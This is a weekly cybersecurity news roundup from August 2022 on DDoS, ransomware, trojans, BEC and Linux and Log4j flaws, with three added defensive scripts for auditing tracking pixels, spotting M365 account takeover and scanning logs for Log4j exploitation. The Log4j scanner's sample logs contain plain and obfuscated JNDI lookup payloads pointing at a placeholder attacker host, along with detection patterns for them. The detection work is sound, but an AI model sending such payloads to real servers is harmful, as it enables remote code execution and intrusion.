Friday, August 26th, 2022
Cybersecurity Week in Review (26/8/22)
Largest HTTPS DDoS Attack Recorded by Google with 46 Million Requests Per Second
Google has reported the largest DDoS attack in history, launched against one of its customers.
On June 1st, a Google Cloud Armor customer was targeted with an HTTPS DDoS attack peaking at 46 million requests per second. It is the most powerful Layer 7 DDoS attack reported to date, surpassing the previous record by at least 76%.
The attacker initially generated only 10,000 requests per second, rising to 100,000 RPS within eight minutes of the attack starting. Early detection by Cloud Armor Adaptive Protection prevented the attack from succeeding: Cloud Armor recommended a protective rule to the customer, and it was delivered before the attack reached its full extent. The alert included a recommended rule that could be used to block the malicious signature. This kept the customer’s service online, and its end users continued to receive service.
In total, 5,256 source IP addresses from 132 countries were involved in the attack. Around 31% of the total attack traffic came from the top four countries.
There is still no information about the malware behind this attack, but the Mēris botnet appears to be the most likely candidate based on the geographical distribution of the attack traffic.
French hospital hit by $10M ransomware attack, sends patients elsewhere
A cyberattack on the Centre Hospitalier Sud Francilien (CHSF), a 1,000-bed hospital located 28 km from the centre of Paris and serving an area of 600,000 inhabitants, has forced the medical centre to refer patients to other establishments and postpone surgical appointments.
The attack targeted the hospital’s business software, its storage systems (in particular medical imaging) and the information system handling patient admissions, rendering them inaccessible. Those in need of emergency care will be evaluated by CHSF’s doctors and, if their condition requires medical imaging for treatment, transferred to another medical centre. A ransom of $10,000,000 has been demanded in exchange for a decryption key.
Signs of a LockBit 3.0 infection have been identified, as LockBit demonstrates a broader targeting scope. If it is responsible for the attack on CHSF, this would violate the RaaS program’s rules, which prohibit affiliates from encrypting the systems of healthcare providers. At this time, attribution to a particular threat group has not been confirmed, and LockBit 3.0’s extortion site contains no entry for CHSF, so its involvement remains a hypothesis.
Ransomware Gang Leaks Data Allegedly Stolen From Greek Gas Supplier
Over 360 gigabytes of data have allegedly been stolen from Greece’s largest natural gas supplier, Desfa, by the Ragnar Locker ransomware operation.
Desfa, established as a subsidiary of Depa (Public Gas Corporation of Greece) in 2007, operates both the country’s natural gas transmission system and its gas distribution networks.
The cyberattack impacted the availability of some systems and also resulted in the leakage of data. Desfa says it has proactively deactivated IT services to contain the incident and is gradually restoring them to normal operation.
The gang said it had contacted the company to inform it of a serious vulnerability but, after not hearing back, decided to publish the data supposedly stolen from the gas system operator on its Tor website, while also attempting to shame the company.
While it is unclear how the cybercriminals compromised Desfa, they have previously been observed targeting Remote Desktop Protocol (RDP) connections for intrusion and then deploying a custom virtual machine to carry out malicious activity unhindered.
Researchers Find Counterfeit Phones with Backdoor to Hack WhatsApp Accounts
Counterfeit versions of popular budget Android smartphone models are shipping with multiple trojans targeting the WhatsApp and WhatsApp Business messaging apps.
The malware was discovered in the system partition of at least four different smartphones, sold as P48pro, radmi note 8, Note30u and Mate40, all of which ran the long-outdated Android 4.4.2.
Specifically, the tampering concerns two files, “/system/lib/libcutils.so” and “/system/lib/libmtd.so”, which are modified so that whenever any app uses the libcutils.so system library, it triggers the execution of a trojan incorporated in libmtd.so.
If the app using the libraries is WhatsApp or WhatsApp Business, libmtd.so proceeds to launch a third backdoor whose main responsibility is to download and install additional plugins from a remote server onto the compromised device.
If instead the app using the libraries is wpa_supplicant, a system daemon used to manage network connections, libmtd.so starts a local server that accepts connections from a remote or local client via the “mysh” console.
It has been theorised that the system partition implants could have been deployed via a trojan from the FakeUpdates (aka SocGholish) malware family, based on the discovery of a backdoor embedded in the system application responsible for over-the-air (OTA) firmware updates.
Hackers Stole Crypto from Bitcoin ATMs by Exploiting Zero-Day Vulnerability
Bitcoin ATM manufacturer General Bytes has confirmed another attack on the cryptocurrency industry, this time exploiting a previously unknown flaw in its software.
“The attacker was able to create an admin user remotely via CAS administrative interface via a URL call on the page that is used for the default installation on the server and creating the first administration user,” the company said in an advisory last week. “This vulnerability has been present in CAS software since version 2020-12-08.”
CAS is short for Crypto Application Server, a self-hosted product from General Bytes that lets companies manage Bitcoin ATM (BATM) machines from a central location via a web browser on a desktop or mobile device. The zero-day flaw, a bug in the CAS admin interface, has been mitigated in two server patch releases, 20220531.38 and 20220725.22.
The goal of the attack was to modify the settings so that all funds would be transferred to a digital wallet address under the adversary’s control.
The company stated that the issue was never identified despite multiple security audits, and that the attack occurred three days after it publicly announced a ‘Help Ukraine’ feature. The incident has been reported to the Czech law enforcement authorities.
Novant Health Says Malformed Tracking Pixel Exposed Health Data to Meta
Over 1.3 million individuals may have had their protected health information (PHI) inadvertently exposed to Meta, healthcare services provider Novant Health has confirmed.
According to Novant Health, which operates a network of hospitals, clinics and medical facilities, the potential data breach was the result of an incorrectly configured Meta tracking pixel on its website.
The pixel contains code that allows organisations to measure activity on their website, and was used on both Novant’s website and its MyChart patient portal. It had been added in May 2020 and was disabled two years later, when Novant Health discovered the potential data exposure after a reporter enquired about its use of the Meta Pixel.
Potentially impacted information included email addresses, phone numbers, computer IP addresses, contact information patients entered into Emergency Contacts or Advanced Care Planning, appointment information, the selected physician, and data such as button/menu selections and/or content typed into free-text boxes.
Although there is no evidence that the information has been acted on by Meta or any third party, Novant Health also says it has not received a definitive response from Meta regarding the potential exposure.
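The exposure described above comes from a third-party beacon loaded on authenticated pages that also carry form fields. The following script, added here as an example and not part of the original report or Novant Health's tooling, audits a set of pages for exactly that combination: it parses each page, lists every script, image or iframe loaded from a host outside an assumed first-party allowlist, and rates the finding higher when the same page takes user input. The page contents, the "/mychart/" prefix for authenticated paths and the example-hospital hostnames are all constructed for the example; connect.facebook.net and www.facebook.com/tr are the real Meta Pixel loader and beacon endpoints, with a placeholder pixel id.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample pages for this example; they are not Novant Health's real markup.
# "/mychart/..." stands in for an authenticated patient-portal path (assumption).
PAGES = {
    "/": (
        '<html><head><script src="https://connect.facebook.net/en_US/fbevents.js"></script></head>'
        '<body><img src="/logo.png"></body></html>'
    ),
    "/mychart/appointments": (
        '<html><head><script src="/static/app.js"></script>'
        '<script src="https://connect.facebook.net/en_US/fbevents.js"></script></head>'
        '<body><form action="/mychart/save"><input name="emergency_contact"></form>'
        '<img src="https://www.facebook.com/tr?id=PIXEL_ID_PLACEHOLDER&ev=PageView" height="1" width="1">'
        '</body></html>'
    ),
    "/mychart/messages": (
        '<html><body><script src="https://static.example-hospital.test/app.js"></script>'
        '<textarea name="message"></textarea></body></html>'
    ),
}

# Hosts the organisation itself controls (assumed for the example); anything else is third party.
FIRST_PARTY_HOSTS = {"www.example-hospital.test", "static.example-hospital.test"}
AUTHENTICATED_PREFIXES = ("/mychart/",)


class PageAudit(HTMLParser):
    """Collects third-party resource loads and notes whether the page takes user input."""

    def __init__(self, first_party):
        super().__init__()
        self.first_party = first_party
        self.third_party = []   # (tag, host) pairs in document order
        self.has_inputs = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "img", "iframe") and a.get("src"):
            host = urlparse(a["src"]).netloc   # empty for relative (same-origin) URLs
            if host and host not in self.first_party:
                self.third_party.append((tag, host))
        elif tag in ("input", "textarea", "select"):
            self.has_inputs = True


def audit(pages, first_party=FIRST_PARTY_HOSTS, authenticated=AUTHENTICATED_PREFIXES):
    """Return findings for authenticated pages that load third-party resources.

    Each finding is (path, tag, host, severity). Severity is 'high' when the page also
    contains form fields, because typed content can travel with the beacon's events.
    """
    findings = []
    for path, html in pages.items():
        if not path.startswith(authenticated):
            continue   # public pages are out of scope for this check
        p = PageAudit(first_party)
        p.feed(html)
        for tag, host in p.third_party:
            findings.append((path, tag, host, "high" if p.has_inputs else "medium"))
    return findings


if __name__ == "__main__":
    for f in audit(PAGES):
        print("%s: <%s> loads %s [%s]" % f)
```

In the constructed sample only the appointments page is flagged: it is behind the portal prefix, loads the pixel script and beacon image from Meta hosts, and contains an input field. The same loop can be pointed at crawled copies of a real portal, with the allowlist set to the organisation's own domains.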
Grandoreiro Banking Trojan Targeting Automotive, Chemicals Manufacturing Industries
The recently identified banking trojan known as Grandoreiro is being utilised by threat actors as a vector for cyberattacks.
Predominantly attacking Spanish-speaking countries such as Mexico and Spain, the campaign has targeted industries including chemicals manufacturing, automotive, machinery and logistics.
Although the malware has been active in the wild since 2017 and has become a serious threat to Spanish-speaking users, the latest campaign began in June of this year. A number of new features have been added to this variant, such as a revamped command-and-control mechanism that makes it more difficult to detect and analyse.
Attackers use social engineering to gain access, sending emails that purport to come from either the Attorney General’s Office of Mexico City or the Spanish Public Ministry, on topics such as state refunds or cancellations of mortgage loans.
These emails redirect victims to a website from which they download a ZIP archive containing malicious code. By disguising the file as a PDF document, the attacker tricks the victim into launching the Grandoreiro loader module, which then fetches the Delphi payload from a remote HTTP file server. The payload is downloaded as a compressed ZIP file 9.2 MB in size.
Once the payload is extracted from the ZIP file, the loader executes it. At this stage the loader collects and sends key pieces of data, such as system information or cryptocurrency wallets, to the C2 as part of the process.
Several anti-analysis and detection-evasion features have been added to the malware to keep it from being detected, laying the groundwork for stealthier operations.
Advanced business email compromise campaign targeting Microsoft 365 organizations
A sophisticated business email compromise (BEC) campaign has been targeting Microsoft 365 organizations, leveraging inherent weaknesses in Microsoft 365 Multi-Factor Authentication (MFA), Microsoft Authenticator, and Microsoft 365 Identity Protection.
Unauthorised access to the Microsoft 365 account of an executive in the organisation was identified from multiple locations, including Singapore, Dubai and San Jose, California. The initial compromise used adversary-in-the-middle (AiTM) phishing for initial access, giving the attacker access to the executive’s account and mailbox.
From there, a second Microsoft Authenticator app was set up for the user without their knowledge. This gave the attackers persistent access to the breached account and effectively nullified the value of MFA.
This attack highlights that, although MFA is an effective defence mechanism, it is not foolproof or the silver bullet some see it as. It should be used as just one of many security layers protecting your organisation. Location could be used as another factor, ensuring that only employees located where the office is can gain access. If someone is travelling internationally, they can submit their itinerary and be allowed to use it from those countries on the dates provided.
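The two signals in this story, sign-ins for one account from several countries in a short window and a new Authenticator registration shortly after a sign-in from an unexpected country, are both visible in sign-in and audit logs. The script below, added here as an example and not part of the original article, runs both checks over a small set of constructed events. The event records and their field names are assumptions made for the example rather than Microsoft's log schema, and the per-user home-country baseline stands in for the kind of itinerary or office data the paragraph above suggests.

```python
from datetime import datetime, timedelta

# Constructed sample events, loosely modelled on Microsoft 365 sign-in and audit
# records. Field names are assumptions made for this example, not a real schema.
EVENTS = [
    {"ts": "2022-08-10T02:14:00", "user": "cfo@example.com", "type": "SignIn", "country": "SG", "result": "Success"},
    {"ts": "2022-08-10T02:31:00", "user": "cfo@example.com", "type": "SignIn", "country": "AE", "result": "Success"},
    {"ts": "2022-08-10T03:05:00", "user": "cfo@example.com", "type": "AuthMethodRegistered", "country": "AE", "method": "Microsoft Authenticator"},
    {"ts": "2022-08-10T09:40:00", "user": "cfo@example.com", "type": "SignIn", "country": "US", "result": "Success"},
    {"ts": "2022-08-10T08:00:00", "user": "dev@example.com", "type": "SignIn", "country": "US", "result": "Success"},
    {"ts": "2022-08-10T17:00:00", "user": "dev@example.com", "type": "SignIn", "country": "US", "result": "Success"},
    {"ts": "2022-08-10T17:20:00", "user": "dev@example.com", "type": "AuthMethodRegistered", "country": "US", "method": "Microsoft Authenticator"},
]

# Countries each user normally signs in from (assumed baseline, e.g. from office or travel data).
HOME_COUNTRIES = {"cfo@example.com": {"US"}, "dev@example.com": {"US"}}


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def find_suspicious_accounts(events, home=HOME_COUNTRIES, window=timedelta(hours=24),
                             min_countries=2, reg_window=timedelta(hours=2)):
    """Return {user: [reasons]} for accounts matching either detection rule.

    Rule 1: successful sign-ins from at least `min_countries` distinct countries
            within any `window`-long span.
    Rule 2: a new authentication method registered within `reg_window` of a
            successful sign-in from a country outside the user's home set.
    """
    by_user = {}
    for e in sorted(events, key=_ts):
        by_user.setdefault(e["user"], []).append(e)

    findings = {}
    for user, evs in by_user.items():
        signins = [e for e in evs if e["type"] == "SignIn" and e["result"] == "Success"]
        reasons = []

        # Rule 1: sliding window over the time-ordered sign-ins.
        for i, first in enumerate(signins):
            seen = {first["country"]}
            for later in signins[i + 1:]:
                if _ts(later) - _ts(first) > window:
                    break
                seen.add(later["country"])
            if len(seen) >= min_countries:
                reasons.append(f"successful sign-ins from {sorted(seen)} within {window}")
                break

        # Rule 2: MFA method added right after a sign-in from a non-home country.
        for reg in (e for e in evs if e["type"] == "AuthMethodRegistered"):
            recent_foreign = [
                s for s in signins
                if s["country"] not in home.get(user, set())
                and timedelta(0) <= _ts(reg) - _ts(s) <= reg_window
            ]
            if recent_foreign:
                reasons.append(f"{reg['method']} registered at {reg['ts']} shortly after "
                               f"sign-in from {recent_foreign[-1]['country']}")

        if reasons:
            findings[user] = reasons
    return findings


if __name__ == "__main__":
    for user, reasons in find_suspicious_accounts(EVENTS).items():
        print(user)
        for r in reasons:
            print("  -", r)
```

On the constructed data the executive's account trips both rules (three countries inside a day, then an Authenticator registration 34 minutes after the Dubai sign-in), while the developer who registers a method from a home country after home-country sign-ins is left alone. Rule 2 is the one worth alerting on at high priority, since a second registered authenticator is what turned a single phished session into durable access in this case.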
8-Year-Old Linux Kernel Bug ‘No Pipe but as Nasty as Dirty Pipe’ Found
A long-standing security vulnerability active in the Linux kernel for over eight years has been revealed.
The new technique, which offers increased generality and potency compared with the Dirty Pipe flaw (reported as CVE-2022-0847, with a CVSS score of 7.8), has been dubbed “DirtyCred.”
Using DirtyCred, privileged credentials are swapped for unprivileged ones in order to escalate privileges. Rather than overwriting critical kernel data fields, DirtyCred relies on heap memory reuse to gain privileges.
A previously unknown vulnerability tracked as “CVE-2022-2588”, a use-after-free issue, was exploited by DirtyCred to escalate privileges. The vulnerability allows an attacker with local access to crash the system and potentially escalate their privileges locally.
Methods to defend against DirtyCred include isolating objects based on their type rather than their privileges, ensuring that privileged credentials are kept separate from unprivileged ones, and using “vmalloc” to isolate the objects in virtual memory.
Iranian cyberespionage group likely exploiting Log4j vulnerabilities
SysAid, a popular IT support and management software application, has been attacked by a group with links to the Iranian government exploiting Log4j 2 vulnerabilities, according to Microsoft.
Both Microsoft and the U.S. government have identified the group, which Microsoft calls MERCURY and is also known as MuddyWater, as affiliated with the Iranian Ministry of Intelligence; the organisations targeted were all located in Israel.
The initial break-ins into SysAid applications occurred on July 23 and 25 of this year. Once initial access to victim environments was gained, the Apache vulnerabilities, which allow remote code execution, were leveraged.
It has been theorised that the attack was related to the Log4j 2 vulnerabilities based on similar observations in the VMware attack earlier this year and the idea that the threat actor sought out similarly vulnerable internet-facing apps to target. SysAid, which provides IT management tools, may have been an attractive target given its presence in the targeted country.
The access was used for reconnaissance, lateral movement and establishing a persistent presence. That includes stealing user credentials, escalating to administrator privileges and adding malware to startup folders to retain access even if the victim reboots.
MuddyWater is viewed by many as Iran’s top cyberespionage group, with a heavy presence in Middle Eastern countries as well as Europe and North America. According to a joint alert put out by the U.S. and UK governments in February, the hacking group is “known to exploit publicly reported vulnerabilities” like Log4j and has also targeted public sector organizations and critical infrastructure across the globe, including the telecommunications, defense, and oil and gas sectors as well as local governments.
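Exploitation of Log4j 2 through an internet-facing application leaves the lookup string in the request logs of whatever sits in front of it, so a log sweep is the first thing to run when a product in this position is suspected of compromise. The script below is an added example, not code from the article or from Microsoft's report: it URL-decodes each access-log line, folds the string-rewriting lookups that are commonly used to hide the keyword from naive pattern matches, and then reports any line that still contains a JNDI lookup. The log lines are constructed, and attacker.example is a placeholder host.

```python
import re
from urllib.parse import unquote

# Constructed web-server access-log lines for this example; they are not from the
# incident described above, and attacker.example is a placeholder host.
SAMPLE_LOGS = [
    '10.0.0.5 - - [23/Jul/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [23/Jul/2022:10:01:09 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://attacker.example/a}"',
    '198.51.100.7 - - [23/Jul/2022:10:01:15 +0000] "GET /login?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2Fattacker.example%2Fb%7D HTTP/1.1" 200 88 "-" "curl/7.8"',
    '203.0.113.9 - - [23/Jul/2022:10:02:00 +0000] "GET /api HTTP/1.1" 200 10 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '10.0.0.6 - - [23/Jul/2022:10:03:00 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]

# Log4j lookups that merely rewrite a string: ${lower:x}, ${upper:x} and the
# default-value form ${name:-x}. Folding each one to "x" exposes the real lookup.
FOLDABLE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}")
# A JNDI lookup with any URL scheme, matched after normalisation.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*[a-z]+://[^}]*", re.IGNORECASE)


def normalize(text, max_rounds=8):
    """URL-decode and fold string-rewriting lookups until the text stops changing.

    Rounds are bounded so a pathological input cannot keep the loop busy.
    """
    for _ in range(max_rounds):
        new = FOLDABLE.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2),
                           unquote(text))
        if new == text:
            return new
        text = new
    return text


def scan(lines):
    """Return (source_ip, normalised_lookup) for every line carrying a JNDI lookup."""
    hits = []
    for line in lines:
        m = JNDI_LOOKUP.search(normalize(line))
        if m:
            hits.append((line.split()[0], m.group(0)))
    return hits


if __name__ == "__main__":
    for ip, lookup in scan(SAMPLE_LOGS):
        print(f"{ip}\t{lookup}")
```

On the sample, the plain lookup, the URL-encoded one with a `${lower:j}` wrapper and the one assembled from `${::-x}` fragments are all reported with the same normalised form, while the harmless `${date:yyyy}` on the last line is not. Matching after normalisation rather than on the raw line is the point: signatures that look only for the literal `${jndi:` miss the second and third requests entirely.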
Source – https://www.scmagazine.com/analysis/threat-intelligence/microsoft-iranian-cyberespionage-group-likely-exploiting-log4j-vulnerability